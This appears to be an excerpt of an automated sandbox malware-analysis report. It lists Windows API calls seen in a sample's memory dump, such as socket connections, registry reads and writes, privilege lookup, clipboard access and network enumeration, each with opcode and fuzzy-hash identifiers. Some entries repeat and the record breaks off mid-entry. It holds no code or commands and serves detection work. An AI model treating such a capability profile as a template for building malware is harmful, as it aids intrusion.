                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 87445ca65801413878bbcd37091697b41c19c56c4b6628ba4cbfb3e473f86e27
                                                                      • Instruction ID: b1cf805f3524b8e7523edf169dc72e467872fe0a1308effac49bf41b5b86670a
                                                                      • Opcode Fuzzy Hash: 87445ca65801413878bbcd37091697b41c19c56c4b6628ba4cbfb3e473f86e27
                                                                      • Instruction Fuzzy Hash: 5821B371508384AFE712CF65DC44F96FFA8EF46310F08C4ABEA449F292D264A548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 04E0481F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: a94a0f6bfba9eacd6964e6d43ab9bb9aa839f505104aae82a1904b16a1e525dc
                                                                      • Instruction ID: be6d27ec9b71a905d8e129a64d146c161fad8819bd202659aac591579dd4f3be
                                                                      • Opcode Fuzzy Hash: a94a0f6bfba9eacd6964e6d43ab9bb9aa839f505104aae82a1904b16a1e525dc
                                                                      • Instruction Fuzzy Hash: 4321DA71449384AFE722CB14DD45F52FFA8DF46720F1880DAEE445F293D268A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03C7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: c20c0c9f5d8370299cba6618a82247f169aa2455ca300dd8619d7f08e04d16f0
                                                                      • Instruction ID: 7063b8393dc9e7f5ea2ae8603602760a0438d0651d7fe4d1f70e2916f52915af
                                                                      • Opcode Fuzzy Hash: c20c0c9f5d8370299cba6618a82247f169aa2455ca300dd8619d7f08e04d16f0
                                                                      • Instruction Fuzzy Hash: 2921A171500304AFE7209F55DC84F6BFBA8EF44720F14885BED44DB281D270A4588A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04E0505E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 8f6a635db0c8c38b59f92e30158e5a21367b7bdfedc22056917d990a95f80eaf
                                                                      • Instruction ID: ab499a4127f341a1aaf0bbd1a4ec4b8c82a4a8edc9a11eb4d3347ebc9d89fef0
                                                                      • Opcode Fuzzy Hash: 8f6a635db0c8c38b59f92e30158e5a21367b7bdfedc22056917d990a95f80eaf
                                                                      • Instruction Fuzzy Hash: 72218371509380AFD712CF65DC45B56BFE8EF06224F0884EAE985CB252D274E848CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0637A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CertCertificateChainPolicyVerify
                                                                      • String ID:
                                                                      • API String ID: 3930008701-0
                                                                      • Opcode ID: 897bef1217a45216f139149acca73c7d308a3a3027f7243d60b186808a740268
                                                                      • Instruction ID: 8e16ff40b4e4e04f73dd82cfb8ad283e0b8068645547eb20cd9918f6b64c8fa4
                                                                      • Opcode Fuzzy Hash: 897bef1217a45216f139149acca73c7d308a3a3027f7243d60b186808a740268
                                                                      • Instruction Fuzzy Hash: 5821AF71008380AFE7228F64DC44F66FFA8EF46310F0884ABEE449B252C365A449CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 04E009F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 92dac264de070fbfefaaab333bee8b263331c067ae7ac90cdb6e29091b40bc5f
                                                                      • Instruction ID: a1d1720bdb59aacdb3fb72d784f8acff2081f1d3571e1ca1de4c102226a6b0fe
                                                                      • Opcode Fuzzy Hash: 92dac264de070fbfefaaab333bee8b263331c067ae7ac90cdb6e29091b40bc5f
                                                                      • Instruction Fuzzy Hash: 7D21AF71500200AFF720DF65D845BA6FBE8EF44320F14C46AEE889B282D670E844CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E037BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      • Opcode ID: e44c802b207b27dca63e0984a58ee5fb6e33337a935c2fb0f6572aa5be66aad4
                                                                      • Instruction ID: f559d776c46d4f1c1bd72318bc1119705b27f41235dd52394e8dd70e89b37daf
                                                                      • Opcode Fuzzy Hash: e44c802b207b27dca63e0984a58ee5fb6e33337a935c2fb0f6572aa5be66aad4
                                                                      • Instruction Fuzzy Hash: D6216AB1100604EFEB218F55DC84FA7BBE8EF49710F18856AEE459B291D270E449CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E011E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 279d7b1c2612159f54d28549fe6d8cd0252f2b5b4bbdabaa38dd983c9e6e2897
                                                                      • Instruction ID: f977cc60deb0799c073150ac1203c6863718bcf35810f33ed48fb39af9f068a9
                                                                      • Opcode Fuzzy Hash: 279d7b1c2612159f54d28549fe6d8cd0252f2b5b4bbdabaa38dd983c9e6e2897
                                                                      • Instruction Fuzzy Hash: CB219371409384AFEB12CF65DC44F56FFB8EF46310F0884ABEA849F252D275A548C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 04E06708
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: 2b8d66dee4de6b732eeddc4439d26152ef8bcb86665bac33f2085713e3a9b0b9
                                                                      • Instruction ID: b7c11a9e268f0dee805ed08361bea4d84d4c81cedae3a8dce0e2ef90c7018ddb
                                                                      • Opcode Fuzzy Hash: 2b8d66dee4de6b732eeddc4439d26152ef8bcb86665bac33f2085713e3a9b0b9
                                                                      • Instruction Fuzzy Hash: 7821A176409780AFDB228F25DC40B52FFB4EF07224F0884CEED858F263D265A958DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenFileMappingW.KERNELBASE(?,?), ref: 04E00575
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: FileMappingOpen
• String ID:
• API String ID: 1680863896-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• K32GetModuleInformation.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0545A
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: InformationModule
• String ID:
• API String ID: 3425974696-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetNetworkParams.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E031AC
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: NetworkParams
• String ID:
• API String ID: 2134775280-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04E04192
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: Connect
• String ID:
• API String ID: 3144859779-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 04E03979
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: CurrentOpenUser
• String ID:
• API String ID: 1571386571-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E002E0
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04E01C11
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: LibraryLoadShim
• String ID:
• API String ID: 1475914169-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03B84
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: ChangeNotifyValue
• String ID:
• API String ID: 3933585183-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessTimes.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00CB5
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: ProcessTimes
• String ID:
• API String ID: 1995159646-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E06292
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: CertCertificateChainPolicyVerify
• String ID:
• API String ID: 3930008701-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSAEventSelect.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E013D2
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: EventSelect
• String ID:
• API String ID: 31538577-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• K32EnumProcessModules.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0536A
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: EnumModulesProcess
• String ID:
• API String ID: 1082081703-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• getsockname.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0110B
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: getsockname
• String ID:
• API String ID: 3358416759-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 04E00221
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: Clipboard
• String ID:
• API String ID: 220874293-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegSetValueExW.KERNELBASE(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E04D44
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• setsockopt.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00091
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: setsockopt
• String ID:
• API String ID: 3981526788-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 04E06651
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFileAttributesW.KERNEL32(?,?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E04DF7
Memory Dump Source
• Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0637A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CertCertificateChainPolicyVerify
                                                                      • String ID:
                                                                      • API String ID: 3930008701-0
                                                                      • Opcode ID: 1ab6bc525c3b1c1102c5d03e8ce70388008e2972ffbc2f508cf811b013446527
                                                                      • Instruction ID: de1cda826570a16576a5b18572b656abbd6d903d4a8949ca0bfc468e179749a2
                                                                      • Opcode Fuzzy Hash: 1ab6bc525c3b1c1102c5d03e8ce70388008e2972ffbc2f508cf811b013446527
                                                                      • Instruction Fuzzy Hash: E311CE71500204EFEB21CF64DD81FAAFBA8EF85320F14C46BEE489B241D674A4598BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DispatchMessageW.USER32(?), ref: 04E06868
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DispatchMessage
                                                                      • String ID:
                                                                      • API String ID: 2061451462-0
                                                                      • Opcode ID: a01d140356dc6e093cbe664ecb619bee1443e3defc9a78510393422df93e65fc
                                                                      • Instruction ID: 7117971ea8c11e8e02cd89988fc276ebdbed20dcb04b183eea9995ab29095ad9
                                                                      • Opcode Fuzzy Hash: a01d140356dc6e093cbe664ecb619bee1443e3defc9a78510393422df93e65fc
                                                                      • Instruction Fuzzy Hash: 23117C754093C4AFD7138F259C44B61BFB4EF47624F0980DAED858F263D2656948CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E011E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 28c7c451a693c4ed409bcb75238c7b1728fc4a8b0d3e37e9a145a17ee5146822
                                                                      • Instruction ID: 039ece26d05fcc9fce7d70ee492d22943e3d0aafae8e3570ba50f1a524d5b6fd
                                                                      • Opcode Fuzzy Hash: 28c7c451a693c4ed409bcb75238c7b1728fc4a8b0d3e37e9a145a17ee5146822
                                                                      • Instruction Fuzzy Hash: 0311E371504204EFEB11CF55DC40FAAFBA8EF48320F14C46BEE089F241D275A5448BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 04E0481F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: a690b31d6f6c4b0133b45dbf480ef28637c312b59940f7cb91bae79fc3eec9a8
                                                                      • Instruction ID: 5d1bbf3fa618a87fbe0015bf3d0126fbb3d3be0e3fcabf09c47315a6cc2a210b
                                                                      • Opcode Fuzzy Hash: a690b31d6f6c4b0133b45dbf480ef28637c312b59940f7cb91bae79fc3eec9a8
                                                                      • Instruction Fuzzy Hash: 6D11CE71500244AEE7209B15DD81FA6FB98DF45720F14C8AAFE445A2C1D2A4A5488AB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03369
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      • String ID:
                                                                      • API String ID: 2506852604-0
                                                                      • Opcode ID: e16c39d242463ca79d2b6c1cef0adb5fe354c21d85a212f5caf6a4b290c8e9c4
                                                                      • Instruction ID: 268e2dc2656ca14683ce95a692de66289ca1a349ee02ef99a7965400b8677598
                                                                      • Opcode Fuzzy Hash: e16c39d242463ca79d2b6c1cef0adb5fe354c21d85a212f5caf6a4b290c8e9c4
                                                                      • Instruction Fuzzy Hash: F711EC31500704EEEB218F15CC84FAAFBA8EF09320F14C45BEE599A291D674A449CBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowTextW.USER32(?,?), ref: 04E0253B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID:
                                                                      • API String ID: 530164218-0
                                                                      • Opcode ID: 2ba6b1cd3cb42b806bcd64344031403240a8df4fa5c205546d63273df8af80dc
                                                                      • Instruction ID: 97916c6edc542944107dd9901a0ed8bab932853e67f5a13a4a8deecfe5413f4b
                                                                      • Opcode Fuzzy Hash: 2ba6b1cd3cb42b806bcd64344031403240a8df4fa5c205546d63273df8af80dc
                                                                      • Instruction Fuzzy Hash: F31194715043849FD7118F25DC45B52FFE8EF06220F0880DEED858B292D275E848CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E038A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      • String ID:
                                                                      • API String ID: 1402429939-0
                                                                      • Opcode ID: fb3e3a293eab6dbf6cbf0cac4a8bf2c152ff26204d4aa26188f7a7771b330151
                                                                      • Instruction ID: 184834c21ae8b16c7b61651e4de358ec405308ff258290e1c5d74ff43cf5b750
                                                                      • Opcode Fuzzy Hash: fb3e3a293eab6dbf6cbf0cac4a8bf2c152ff26204d4aa26188f7a7771b330151
                                                                      • Instruction Fuzzy Hash: A711E175500204EEEB208F15CC84FA6FBA8EF05320F14C4ABEE455B381D274A448CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0345B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterInfo
                                                                      • String ID:
                                                                      • API String ID: 3405139893-0
                                                                      • Opcode ID: fb3e3a293eab6dbf6cbf0cac4a8bf2c152ff26204d4aa26188f7a7771b330151
                                                                      • Instruction ID: 0a06aa97b5032ebdd2411dd9101d09efc144893e6f3abdbcaf006678339a8f7f
                                                                      • Opcode Fuzzy Hash: fb3e3a293eab6dbf6cbf0cac4a8bf2c152ff26204d4aa26188f7a7771b330151
                                                                      • Instruction Fuzzy Hash: 1311E171500604EEEB218F55CC84FA6FBA8EF05320F14C0ABEE595B381D2B4A449CAB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04E0162C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: d809ebb43ae02870d09701297e4c4d998e1dc86061b437f3974802212f48d8a5
                                                                      • Instruction ID: bfaa4a0f60faf274684ce8a2793488b30d3c95da8ac01a03a90ca8e6529624c3
                                                                      • Opcode Fuzzy Hash: d809ebb43ae02870d09701297e4c4d998e1dc86061b437f3974802212f48d8a5
                                                                      • Instruction Fuzzy Hash: E8118E71409384AFDB228F54DC44A52FFB4EF46220F08889AED898B262C275A958DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E065A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: ad04934df2a47b0fba042a4ad8b60a9c1a8dd78ce34112e7f9eca5ffb2c859c7
                                                                      • Instruction ID: 366e32f3d0d1b2b3671fe0968be288ef86cd39cbcd9ffa036bbbf768a411d54e
                                                                      • Opcode Fuzzy Hash: ad04934df2a47b0fba042a4ad8b60a9c1a8dd78ce34112e7f9eca5ffb2c859c7
                                                                      • Instruction Fuzzy Hash: 87119E715093C49FD7128F25DC94B52BFB4AF16220F0884EBED858B2A2D265A958CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02E93
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 1780a1dc2d63f4cadc4c7a8fe0b6149ca5f993c03c10c73d66031b856300042c
                                                                      • Instruction ID: 53337f4c10dc197b2d614f3c88c25bdd397613e4d7c51966adb4a7ff4ecd4902
                                                                      • Opcode Fuzzy Hash: 1780a1dc2d63f4cadc4c7a8fe0b6149ca5f993c03c10c73d66031b856300042c
                                                                      • Instruction Fuzzy Hash: A511A0725083849FD712CF25DC85A52FFE4EF06320F1880DEED858B262D275A848CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04E0505E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 381c10de55d1997dcbc318d46d58bed70fe692194c7542982fddeb3482049dda
                                                                      • Instruction ID: 847c1ce0aa302026f36172146ad9b0337cc3182c96fb44543281c0609cd3ce8b
                                                                      • Opcode Fuzzy Hash: 381c10de55d1997dcbc318d46d58bed70fe692194c7542982fddeb3482049dda
                                                                      • Instruction Fuzzy Hash: 491130B1600244EFDB50CF69D845B6AFBD8EF44320F18D46ADD59CB281E675E444CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,?,?,?), ref: 04E02A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 0e662fdcd7d41ede929a9c234f6b4813d54114484095d533e70450716ce2dd8e
                                                                      • Instruction ID: 796b90a65f0df80d0470f24600900b14c6bb0063a4000003db174098f23eb3c4
                                                                      • Opcode Fuzzy Hash: 0e662fdcd7d41ede929a9c234f6b4813d54114484095d533e70450716ce2dd8e
                                                                      • Instruction Fuzzy Hash: 8C1194714093C4AFDB228F15DC44A52FFF4EF16220F0884DEEE854B663D275A958DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetNetworkParams.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E031AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: NetworkParams
                                                                      • String ID:
                                                                      • API String ID: 2134775280-0
                                                                      • Opcode ID: 1f0fcc40bf28718fe73314023f0187a642314b693143b633d77b01e6e7aadbf8
                                                                      • Instruction ID: 97db9af9c9b5ac9a12f826d11d38d7902557f66b1529b138f5cb964d64fd40c4
                                                                      • Opcode Fuzzy Hash: 1f0fcc40bf28718fe73314023f0187a642314b693143b633d77b01e6e7aadbf8
                                                                      • Instruction Fuzzy Hash: 70010431504204EEEB118F15DC81FA6FFA8EF09320F14C09BEE449B381D2B4A448CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04E04192
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Connect
                                                                      • String ID:
                                                                      • API String ID: 3144859779-0
                                                                      • Opcode ID: 8674acd8c2e9ed9f217278bf02dc5a7602054608cbfdb1e2051ccd77fd562e87
                                                                      • Instruction ID: d876350f21bae29690df63dae296e94a2ae9da95e5b0ac57a1715a63b00b003b
                                                                      • Opcode Fuzzy Hash: 8674acd8c2e9ed9f217278bf02dc5a7602054608cbfdb1e2051ccd77fd562e87
                                                                      • Instruction Fuzzy Hash: F0117C31504604EFDB21CF95D944B56FFE4EF08320F08C6AADE498B6A2D371E458DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFileAttributesW.KERNEL32(?,?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E04DF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
